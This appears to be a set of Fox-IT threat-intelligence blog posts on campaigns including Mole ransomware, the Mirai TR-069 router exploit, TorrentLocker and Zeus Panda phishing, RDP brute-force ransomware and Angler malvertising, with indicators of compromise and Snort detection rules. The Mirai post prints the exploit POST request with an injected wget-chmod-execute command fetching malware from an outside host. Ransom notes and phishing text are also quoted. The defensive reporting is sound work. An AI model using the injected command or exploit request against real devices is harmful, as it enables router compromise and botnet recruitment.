A Mole exposing itself to sunlight

With the daily growth of the different kinds of ransomware and distribution techniques, Fox-IT’s Security Operations Center was investigating a new ransomware called Mole. This ransomware is currently being spread by a social engineering exploit kit to trick the user in downloading a malicious executable.

The ransomware author of Mole made a small mistake, which gives everyone the statistics of all the infected clients.

Distribution of Mole

The social engineering exploit-kit tricks the user in downloading and installing a malicious “plugin” for Office.


After executing the malicious “plugin”, the user receives a fake pop-up displaying an error message. Although the message indicates that the installation has failed, it’s an indicator that ransomware is successfully executed. After displaying the fake error message, certain processes will be terminated, the Windows backups used for recovery will be deleted and the encryption process will be initiated.


Once the encryption process is done, all the files will have the .MOLE extension and a ransom note will be displayed. Currently it’s not possible to recover your files for free, the only solutions is to clean the pc from the infection and restore from a recent backup.

What makes this ransomware different?

Compared to all the other ransomware currently being spread, Mole isn’t any different.
Except that the author of the Mole-ransomware made a small mistake, the statistics of Mole’s infections are openly accessible.



While tracking the infection process, Fox-IT noticed a sudden growth in infections within few hours’ time. The current total of infections is 500+ and growing, further investigation indicates that almost 50% of the IP’s were unique. The fact that around the half of the IP’s are unique, could be because companies are being targeted.

1 United States 86
2 Great Britain 17
3 Germany 12
4 Korea 11
5 India 11
6 Netherlands 10
7 China 10
8 Canada 8
9 France 6
10 Norway 5

Top 10 unique IP infections per country


Indicators of compromise

Hash: 5ca18c9f5ec26a30de429accf60fc08b0ef785810db173dd65c981a550010dde (pluginoffice.exe)
Hash: e6591a9389c7b82d59949b8c5660e773b86dff1fa3909f780cb8c88bbc85646c (plugin-office.exe)

Hostname: digitalecosystems.com (download)
Hostname: network.mrtg.belcenter.net (download)
Hostname: brutenutrition.net (download)
Hostname: bettermannow.com (download)

IP: (C2 server)

Ransom note:

All your important files were encrypted on this computer.
You can verify this by click on see files an try open them.
Encryption was produced using unique public key RSA-1024 generated for this computer.
To decrypted files, you need to obtain private key.
The single copy of the private key, with will allow you to decrypt the files, is locate on a secret server on the internet.
The server will destroy the key within 78 hours after encryption completed.
To retrieve the private key, you need to  Contact us by email , send us an email your DECRYPT-ID-xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx number
and wait for further instructions.
For you to be sure, that we can decrypt your files – you can send us a single encrypted file and we will send you back it in a decrypted form.
Please do not waste your time! You have 72 hours only! After that The Main Server will double your price!


Turkish hacktivists targeting the Netherlands: high noise, low impact

As a result of increased political tensions between The Netherlands and Turkey, a surge in activity from several Turkish hacker groups has been observed by Fox-IT.

Most activities observed thus far appear to be aimed at defacement and disruption of online Dutch infrastructure. Most of the methods and techniques used to achieve this goal are relatively simple and can be executed by an individual with basic knowledge and skills.

Targets of ‘disruption attacks’, in the form of Distributed Denial of Service (DDoS) attacks, appear to have been directly related to the conflict between Turkey and The Netherlands, with regards to the denial of two of Turkey’s ministers from visiting The Netherlands on March 11th 2017. Some of the targeted websites had difficulties defending against the DDoS attacks, such as stemwijzer.nl and kieskompas.nl, resulting in downtime, just one day before the Dutch elections.

List of Dutch DDoS targets

Defacements were seen across seemingly random Twitter accounts and Dutch websites, carried out by individuals which gathered on publically accessible hacking forums, where hackers were called to arms, using operation names such as Hollanda Operasyonu (translated: Holland Operation).

An example of a WordPress website (iwiweb.nl) defaced, using the recently disclosed WordPress content injection vulnerability, can be seen on the image below:


Most of these defacement attempts can be stopped by following basic security guidelines, such as regularly updating WordPress & other software installed on the webserver.

The full write-up describes several methods and techniques used by the Turkish hacker groups in order to compromise, deface or disrupt online Dutch infrastructure.

Download the write-up ‘Turkish Hacktivism targeting The Netherlands’

Detecting Ticketbleed (CVE-2016-9244)

On Thursday February 9th the vulnerability named ’Ticketbleed’ was made public. The name of this vulnerability does not just sound similar to Heartbleed, but also shares the same implication: remote reading of uninitialized memory. At the time we published Snort IDS detection rules for the Heartbleed vulnerability in OpenSSL, and have now decided to do the same for the F5 vulnerability: Ticketbleed.

About Ticketbleed:
The vulnerability that would later become known as Ticketbleed, was identified by Filippo Valsorda following a support ticket at Cloudflare. The symptoms were failing connections between applications using the TLS Library of the Go programming language and F5 BIG-IP appliances. Filippo identified that SSL resumption requests were failing due to an assumption of the Session Ticket ID length in F5’s TLS stack. This exposes up to 31 bytes of memory per session, a lot less than Hearbleed, which leaked 64k bytes at a time. For more technical details see Finding Ticketbleed post by Filippo.

Those running vulnerable F5 Appliances have two options to mitigate this vulnerability. One option is to disable Session Tickets entirely on the F5, this should stop the leaking of memory immediately and at virtually no cost. The recommended fix is to upgrade to the latest firmware which plugs this specific problem entirely as described in the following KB article K05121675.

At Fox-IT we frequently write IDS detection rules, especially for customers, APTs, hacking tools or new vulnerabilities like Ticketbleed. The Ticketbleed website bears the following warning for those writing IDS signatures to detect the vulnerability:

The issue can be identified by passive traffic monitoring, as the Session ID field is unencrypted.

However, I’d like to strongly discourage IDS vendors from making signatures that simply detect Session IDs shorter than 32 bytes. Any length between 1 and 32 bytes is legal according to the RFC specification.

The Go standard library legitimately uses 16 bytes Session IDs, and browsers considered using 1 byte Session IDs for this purpose. It’s important for security software not to needlessly constrain future decisions in that direction.

Taking this into account, we wrote two signatures for Snort IDS. The first rule searches for ‘Client Hello’ packets that have a session identifier that is shorter than 32 bytes. Using the ‘flowbits’ feature of Snort, the second signature looks for a ‘Server Hello’ packet that does contain a 32 byte session identifier. Writing rules to match binary protocols such as TLS can be challenging and has a higher chance of false positives. While this signature has not resulted in any False Positives on our side, we welcome any feedback as a result of these rules.

The two rules can be found on our GitHub Gists:


When trying to verify hits in Wireshark we used the following expression filters:

Identify packets containing SSL session identifiers:


Search for session identifiers smaller than 32 bytes and equal to 32 bytes:

(ssl.handshake.session_id_length > 0 && ssl.handshake.session_id_length < 32) || ssl.handshake.session_id_length == 32

If the above filter returns two packets, you are likely dealing with a vulnerable F5 appliance. As can be seen in the following screenshot:


Wireshark filter matching Client en Server Hello with different ‘Session ID’ lengths.

Special thanks to Yun Zheng Hu for writing these rules!

Recent vulnerability in Eir D1000 Router used to spread updated version of Mirai DDoS bot

Over the last two months a lot has been written about the DDoS malware called Mirai. The first known attack, that only later was attributed to Mirai, was against the Krebs On Security blog on September 20th. It is likely that this same botnet attacked Dyn a month later, causing a massive outage among popular websites world wide.

Previous attacks:

One of the attack types that appears to be new to the scene is the use of the Generic Router Encapsulation (GRE) protocol in order to flood victims with packets. This protocol was used against Krebs, but has also been mentioned before. More specifically in a piece by Arbor Networks about an IoT botnet, attacking the networks of the Olympics in Brazil. This could be Mirai, but the first known command and control (C2) server for Mirai was not registered until 2016-09-14. So either it was a different IoT botnet, such as Linux/Fgt (by Lizardsquad) or there was a previous Mirai botnet.

Shortly after the attack against Dyn, the main botnet, using C2 server santasbigcandycane.cx, went quiet and the source code of the Mirai botnet was released:

mirai-hfSource: https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/

As a result of the source code becoming public, many new Mirai botnets started to appear. These botnets were a lot smaller than the original one. This is likely because the original botnet only spread by using default credentials of Telnet enabled devices and scanning the internet for them. So a limited amount of victims, most of which were likely already infected by the original botnet and because of that, blocking new infections.

Two researchers (@MalwareTechBlog & @2sec4u) created a public twitter feed tracking attacks launched by these Mirai botnets (@MiraiAttacks), so far they have identified at least 79 sub-botnets.

Recently there were claims of a bigger Mirai botnet, one that was bigger than all of the other ones combined. The operators of this botnet are selling access to this botnet and claim to have over 400.000 bots and using different spreading techniques than the original Mirai bot. The previously listed Mirai Tracker lists this botnet as ‘#14’.

Mirai botnet spreading using SOAP exploit:

A Mirai botnet using a different spreading approach than the original bot was observed by Fox-IT on Sunday. Just as the original botnet, the bots start attacking other devices on the internet in an attempt to infect them. Where the original bot uses Telnet and a set of default credentials, this version uses a recently documented SOAP exploit.

The bot is using the following POST request on TCP port 7547 to infect other devices:

POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
<SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> 
cd /tmp;wget http://l.ocalhost[.]host/1;chmod 777 1;./1

A write-up on how this exploit works is provided by ‘Kenzo2017’ in his blogpost. The exploit is located in the implementation of a service that allows ISPs to configure and modify settings of specific modems using the TR-069 protocol. One of those settings allows, by mistake, the execution of Busybox commands such as wget to download malware. BusyBox is software that provides several stripped-down Unix tools in a single executable file.

In the exploit code you can see that the protocol allows for the ISP to set the NTP-servers which the modems should use, but rather than entering an IP or a hostname, a bash/busybox command is given:

`cd /tmp;wget http://l.ocalhost[.]host/1;chmod 777 1;./1`

We can break this command up in multiple parts:

– ‘wget’ is used to retrieve the malware from http://l.ocalhost[.]host.
– ‘chmod 777 1’ makes the file executable.
– ‘./1’ executes the malware on the system.

So could this be the Botnet #14, where the authors are boasting 400k infections?
This is possible, but for now difficult to verify. What we do know is that these management interfaces for modems are being exposed at various internet service providers around the world. In Germany this has lead to big problems for Deutsche Telecom, where an attacker disabled the internet for 900.000 modems, possibly using the same vulnerability. For now it is unclear if there was an attempt to load Mirai on these devices, or whether this is an unrelated attack.

This is likely not the last we will be seeing of Mirai and its successors. New spreading mechanisms and DDoS attack methods are being added in this gold rush for new victims, something we outlined more high level in a previous blog post.
Fox-IT is observing this botnet for future activity and possible victims of its DDoS attacks.


  • ISPs should configure the modems to only allow connections to their management interfaces from the ISPs own management network, not the whole world.
  • Users could replace these modems if possible with their own, better secured devices.
  • Contact the ISP and vendor of the modems for patches that might resolve the vulnerability.


Hash: c723eebacfc8b845efbcc33c43dd3567dd026b1d (MIPS)
Hash: f37d2f6ff24429db2fc83434e663042c2667fa41 (ARM)

Hostname: l.ocalhost[.]host (download location)
Hostname: timeserver[.]host (c2 server)

New download location observed in Fox-IT honeypots:
Hostname: tr069[.]pw (download location)
Hostnane: p.ocalhost[.]host (download location)
IP: 5.8.65[.]5 (download location)

The following Snort IDS rule can be used to detect spreading attempts against your network:

alert tcp $EXTERNAL_NET any -> $HOME_NET 7547 (msg:”FOX-SRT – Exploit – TR-069 SOAP RCE NewNTPServer exploit incoming”; flow:established,to_server; content:”POST”; depth:4; content:”/UD/act?1″; content:”urn:dslforum-org:service:Time:1#SetNTPServers”; threshold: type limit, track by_dst, count 1, seconds 60; classtype:attempted-admin; reference:url,blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot; sid:1; rev:1;)

By changing the HOME_NET and EXTERNAL_NET in this rule, it can be used to detect clients within your network attacking hosts on the internet:

alert tcp $HOME_NET any -> $EXTERNAL_NET 7547 (msg:”FOX-SRT – Exploit – TR-069 SOAP RCE NewNTPServer exploit outgoing”; flow:established,to_server; content:”POST”; depth:4; content:”/UD/act?1″; content:”urn:dslforum-org:service:Time:1#SetNTPServers”; threshold: type limit, track by_src, count 1, seconds 60; classtype:attempted-admin; reference:url,blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot; sid:2; rev:1;)

These Snort rules can also be found on our Github.

Ziggo ransomware phishing campaign still increasing in size


Fox-IT’s Security Operations Center (SOC) observed fake Ziggo invoice e-mails, since October 6th 2016, linking to a ransomware variant known as TorrentLocker.

The group behind TorrentLocker has previously been observed using fake Dutch postal service emails imitating PostNL, back in 2014.  This distribution method of abusing local postal service names was seen in a lot of countries where this threat was active. This was also documented in CERT PL’s report ‘Going Postal’ published last year. After continuous takedowns of the fake invoice domains with the help of Abuse.CH, the group seized their activities in the Netherlands, near the end of 2014, but continued in several other countries around the world.

The switch from using fake track and trace e-mail messages from postal services (from 2014 till 2016), to using fake invoices from a local Dutch ISP known as Ziggo, is an interesting switch in the modus operandi of the group behind TorrentLocker.

The reach of this e-mail campaign is rapidly increasing as a result of TorrentLocker stealing the address books from its victims to expand its list of new targets. Every successful infection increases the reach of the malicious e-mail campaign significantly. 

Current phishing e-mail

The e-mail below is an example of the phishing e-mail, which mimics the real Ziggo invoice e-mails:

Example of Ziggo phishing e-mail

The e-mail above contains a link to a fake Ziggo page that will force the user to download a ZIP file with the supposed invoice inside. The ZIP file contains a JavaScript file which will, when executed by the victim, download the TorrentLocker ransomware from a compromised WordPress website. When the victim’s data is encrypted, TorrentLocker shows the screen below, still using the name ‘Crypt0L0cker’, as seen 2 years ago:

TorrentLocker lock screen

Indicators of compromise

Currently (October 6th 2016) active campaign distribution domain:

  • ziggo-online23.org /

Other Ziggo domains used in previous e-mail campaigns:

  • ziggo-online23.org
  • ziggo-online12.com
  • ziggo-online247.net
  • ziggo-online24.net
  • ziggo-online24.org
  • ziggo-factuur84.org
  • ziggo-factuur23.org

All domains registered by the group behind TorrentLocker are registered at REG.RU. With the continued effort of AbuseCH we have been taking down these domains as soon as they appear.

TorrentLocker initially communicates via SSL to several IPs to reach its command and control server. The current IP being used for this communication is:


The certificate used for this SSL connection typically contains the following static information (more sample and information for these SSL certificates can be found on AbuseCH’s SSL Blacklist):

  • C=US, ST=Denial, L=Springfield, O=Dis

After the initial SSL connection, all other network communication is ran through Tor. Files encrypted by TorrentLocker will be appended by the ‘.enc’ extension. More details on the prevention of ransomware can be found in our earlier TorrentLocker blog: New Torrentlocker variant active in the Netherlands.

Mofang: A politically motivated information stealing adversary

mofang_cover_imageMofang (模仿, Mófa ̌ng, to imitate) is a threat actor that almost certainly operates out of China and is probably government-affiliated. It is highly likely that Mofang’s targets are selected based on involvement with investments, or technological advances that could be perceived as a threat to the Chinese sphere of influence. This is most clearly the case in a campaign focusing on government and critical infrastructure of Myanmar that is described in this report. Chances are about even, though, that Mofang is a relevant threat actor to any organization that invests in Myanmar or is otherwise politically involved. In addition to the campaign in Myanmar, Mofang has been observed to attack targets across multiple sectors (government, military, critical infrastructure and the automotive and weapon industries) in multiple countries.

The following countries have, in the above named sectors, been affected, although Fox-IT suspects there to be more: India, Germany, United States, Canada, Singapore, South Korea.


Despite its diverse set of targets Mofang is probably one group. This is based on the fact that its tools (ShimRat and ShimRatReporter) are not widely used, and that campaigns are not usually observed in parallel. Technically, the group uses distinct tools that date back to at least February 2012: ShimRat and ShimRatReporter. The mofang group does not use exploits to infect targets, they rely on social engineering and their attacks are carried out in three stages:

  1. Compromise for reconnaissance, aiming to extract key information about the target infrastructure.
  2. Faux infrastructure setup, designed to avoid attracting attention.
  3. The main compromise, to carry out actions on the objective.

The name ShimRat is based on how its persistence is build up. It uses the so-called shims in Windows to become persistent. Shims are simply hot patching processes on the fly, to ensure backward compatibility of software on the Microsoft Windows platform.

As far as known, the only exploits the Mofang group uses are privilege elevation exploits built into their own malware. The vulnerabilities that were being exploited were already known about at the time of use. The full report contains contextual as well as technical information about the group and its activities. These can be used, for example, for threat assessments, compromise assessments, incident response and forensics activities.

Download ‘Mofang – a politically motivated information stealing adversary’

LinkedIn information used to spread banking malware in the Netherlands

Since early this morning (7th of June 2016, around 08:30 AM) the Fox-IT Security Operations Center started detecting a large amount of phishing e-mails containing a malicious Word document. This e-mail campaign appears to be targeting the Netherlands, using Dutch text in both the e-mail and Word document. The content of the e-mail:

Geachte Firstname Lastname,
Wij schrijven u in verband met de factuur met nummer 014321463. De nota staat open sinds 9-jun-16. Het openstaande bedrag is 2,487.50 Euro. Vriendelijk verzoeken wij u het openstaande bedrag te betalen.
Betaling graag zo spoedig mogelijk.
Met vriendelijke groet,
A.E. De Kuiper, BEEREJAN HOLDING BV. Faisantenstraat 53 Hilversum 1211 PT Tel. +31180647000 Fax. +31294484970

The first name, last name, role and company name are all values that are taken from the LinkedIn page of the receiver of the phishing mail, giving the e-mail a very personalized look.

The subject of the e-mail contain the company name, with a semi-random invoice related subject. Some examples:

  • Company : De nota is nog niet betaald
  • Company – De nota is onbetaald gebleven
  • Company – Uw laatste factuur wacht op betaling

At this point Fox-IT cannot directly link this phishing campaign to the recent LinkedIn database leak.

The e-mail contains a Word document with a Macro.
The name of the document is also based on personal information of the receiver:

  • Company-Firstname-Lastname.doc

Screenshot phishing campagin

The content of the Word document appears to be scrambled, this is an attempt to trick the user into running the embedded Macro, in order to view the document.

The Macro retrieves a binary from the following (likely compromised) website:

  • ledpronto.com/app/office.bin (sha256: c1e21a06a1fa1de2998392668b6910ca2be0d5d9ecc39bd3e3a2a3ae7623400d)

The Fox-IT InTELL team has identified the retrieved malware as the Zeus Panda banking malware. Zeus Panda, in this case, always connects to the following domain & IP using SSL:

  • skorianial.com /

Zeus Panda is a type of banking malware based on Zeus source code, more information can be found here: https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market

The following SSL certificate is used by the Panda Zeus Command and Control server:

If you’ve opened the Word attachment and enabled the Macro, consider scanning your system with various anti-virus solutions.

Ransomware deployments after brute force RDP attack

Fox-IT has encountered various ways in which ransomware is being spread and activated. Many infections happen by sending spam e-mails and luring the receiver in opening the infected attachment. Another method is impersonating a well-known company in a spam e-mail stating an invoice or track&trace information is ready for download. By following the link provided in the e-mail, the receiver can download the file which contains the malware from a convincing looking website. Distributing ransomware through malvertising, an exploit kit being served on an advertisement network, is also a common way for criminals to infect systems.

In the past few months, Fox-IT’s incident response team, FoxCERT, was involved in several investigations where a different technique surfaced: activating ransomware from a compromised remote desktop server.

Getting access

Before we get to why this might be lucrative for the criminals, how do they get access in the first place? RDP, or Remote Desktop Protocol, is a propriety protocol developed by Microsoft to provide remote access to a system over the network. This can be the local network, but also the Internet. When a user successfully connects to a system running remote desktop services (formerly known as terminal services) over RDP, the user is presented with a graphical interface similar to that when working on the system itself. This is widely used by system administrators for managing various systems in the organization, by users working with thin clients, or for working remotely. Attackers mostly tend to abuse remote desktop services for lateral movement after getting foothold in the network. In this case however, RDP is their point of entry into the network.

Entries in the log files show the attackers got access to the servers by brute forcing usernames and passwords on remote desktop servers that are accessible from the internet. Day in, day out, failed login attempts are recorded coming from hundreds of unique IP-addresses trying hundreds of unique usernames. Connecting remote desktop servers directly to the internet is not recommended and brute forcing remote desktop services is nothing new. But without the proper controls in place to prevent or at least detect and respond to successful compromises, brute force RDP attacks are still relevant. And now with a ransomware twist as well.

Image 1: Example network with compromised RDP server and attacker deploying ransomware.

The impact

After brute forcing credentials to gain access to a remote desktop server, the attackers can do whatever the user account has permissions to on the server and network. So how could an attacker capitalize on this? Underground markets exist where RDP credentials can be sold for an easy cash-out for the attacker. A more creative attacker could attempt all kinds of privileged escalation techniques to ultimately become domain administrator (if not already), but most of the times this is not even necessary as the compromised user account might have access to all kinds of network shares with sensitive data. For example Personally identifiable information (PII) or Intellectual property (IP) which in its turn can be exfiltrated and sold on underground markets. The compromised user account and system could be added to a botnet, used as proxy server, or used for sending out spam e-mail messages. Plenty of possibilities, including taking the company data hostage by executing ransomware.

Depending on the segmentation and segregation of the network, the impact of ransomware being executed from a workstation in a client LAN might be limited to the network segments and file shares the workstation and affected user account can reach. From a server though, an attacker might be able to find and reach other servers and encrypt more critical company data to increase the impact.

The power lies in the amount of time the attackers can spend on reconnaissance if no proper detection controls are in place. For example, the attackers have time to analyze how and when back-ups are created of critical company data before executing the ransomware. This helps to make sure the back-ups are useless in restoring the encrypted data which in its turn increases the chances of a company actually paying the ransom. In the cases Fox-IT was involved in investigating the breaches, the attackers spend weeks actively exploring the network by scanning and lateral movement. As soon as the ransomware was activated, no fixed ransom was demanded but negotiation by e-mail was required. As the attackers have a lot of knowledge of the compromised network and company, their position in the negotiation is stronger than when infection took place through a drive-by download or infected e-mail attachment. The demanded ransom reflects this and could be significantly higher.

Image 2: Example ransomware wallpaper.

Prevention, detection, response

Connecting Remote Desktop Services to the Internet is a risk. Services like that, which are not essential, should be disabled. If remote access is necessary, user accounts with remote access should have hard to guess passwords and preferably a second factor for authentication (2FA) or second step in verification (2SV). To prevent eaves dropping on the remote connection, a strong encryption channel is recommended. Brute force attacks on remote desktop servers and ransomware infections can be prevented. Fox-IT can help to improve your company’s security posture and prevent attacks, for example by an architecture review, security audit or training.

If prevention fails, swift detection will reduce the impact. With verbose logging securely stored and analyzed, accompanied by 24/7 network and end point monitoring an ongoing breach or malware infection will be detected and remediated. The Cyber Threat Management platform can assist in detecting and preventing attacks. And if business continuity and reputation are at stake, our emergency response team is available 24/7.

Wouter Jansen, Senior Forensic IT Expert at Fox-IT





Large malvertising campaign hits popular Dutch websites

On Sunday April 10th the Fox-IT Security Operations Center (SOC) started to see an increase of exploit kit related incidents. The incidents originated from a large malvertising campaign hitting the Netherlands. The list of affected websites spreads across most of the popular Dutch websites. In total we’ve now seen at least 288 websites being affected. To give an impression of the impact, the list of affected websites includes:

  • nu.nl
  • marktplaats.nl
  • sbs6.nl
  • rtlnieuws.nl
  • rtlz.nl
  • startpagina.nl
  • buienradar.nl
  • kieskeurig.nl
  • veronicamagazine.nl
  • iculture.nl
  • panorama.nl

Note: Malvertising is caused by malicious content providers in the advertisement ecosystem, and not caused by the affected websites themselves (f.e those listed above).

We’ve been in contact with the affected advertisement provider who responded quickly to the incident and has filtered the listed IOCs in their advertisement platform. They will be tracking down the affected content provider as this issue has not been fully resolved, it has simply been filtered for now. More information on malvertising can be found here: [ Malvertising: Not all Java from java.com is legitimate ].

Details of the exploit kit redirect

The malvertising is occurring through an advertisement platform which is actively used on the above mentioned websites. From the websites, external scripts are loaded which in turn redirect further towards the exploit kit. We’ve observed the Angler Exploit Kit being active on these redirects during this campaign. We have not seen any successful infections at our customer yet.

One of the redirects towards the Angler exploit kit as observed by our monitoring platform:


Indicators of Compromise (IOCs)

The following two domains have been observed to redirect the users from the affected websites towards the exploit kits. Blocking these two domains will aid in stopping the redirects for now:

  • traffic-systems.biz (
  • medtronic.pw (

Website of security certification provider spreading ransomware

Since Monday the 21st of March the Fox-IT Security Operations Center (SOC) has been observing malicious redirects towards the Angler exploit kit coming from the security certification provider known as the EC-COUNCIL. As of writing this blog article on the Thursday the 24th of March the redirect is still present on the EC-COUNCIL iClass website for CEH certification located at iclass[dot]eccouncil[dot]org. We have reached out and notified the EC-COUNCIL but no corrective action has been taken yet.

Update 25-4-2016: EC-COUNCIL put out a publication regarding the malicious redirect. They’ve cleaned up and removed the malicious redirect, the publication was made on their Facebook page and linked to on their Twitter account.

Exploit kit details: Angler exploit kit

We first observed the redirect on Monday around 3pm GMT but we suspect it might have been there for a longer period of time. The redirect occurs only when specific conditions are met, these conditions are:

  • The visitor has to have Microsoft Internet Explorer as a browser (or at least the user-agent has to represent Internet Explorer)
  • The visitor comes from a search engine like Google or Bing
  • The visitor’s IP address is not blacklisted or belonging to a blocked geolocation. The inject avoids certain countries (possibly tied to a bad ‘ROI’ for the criminals running the ransomware that is being dropped)

Once a visitor meets all these requirements a redirect is embedded at the bottom of the page as seen in this screenshot:
EC-COUNCIL iClass Angler exploit kit injected script

Through this embedding the client is redirected a couple of times to avoid/frustrate/stop manual analysis and some automated systems. Once the user has jumped through all the redirects he/she ends up on the Angler exploit kit landing page from which the browser, flashplayer plugin or silverlight plugin will be exploited. The Angler exploit kit first starts the ‘Bedep’ loader on an exploited victim machine which will download the final payload.

The way the redirect occurs on the EC-COUNCIL website is through PHP code on the webserver which is injecting the redirect into the webpage. A vulnerability in the EC-COUNCIL website is most likely exploited as it runs the very popular WordPress CMS which has been a target through vulnerable plug-ins for years.

Payload details: TeslaCrypt

This specific campaign instance of the Angler exploit kit drops ‘TeslaCrypt’ on the exploited victim’s machine. TeslaCrypt is a piece of ransomware which takes a victim’s files hostage with the use of encryption. Once the victim’s files have been successfully encrypted a ransom note is presented to instruct the victim on ways to recover files:

TeslaCrypt 4.0 ransom notes

TeslaCrypt requires the victim to pay around 1.5 BTC to get their files back; this equals to approximately 622$ at the current conversion rate.

Indicators of Compromise (IOCs)

Bedep C&C servers:

  • / kjnoa9sdi3mrlsdnfi[.]com
  • / moregoodstafsforus[.]com
  • / jimmymorisonguitars[.]com
  • / bookersmartest[.]xyz

TeslaCrypt C&C servers:

  • / mkis[.]org
  • / tradinbow[.]com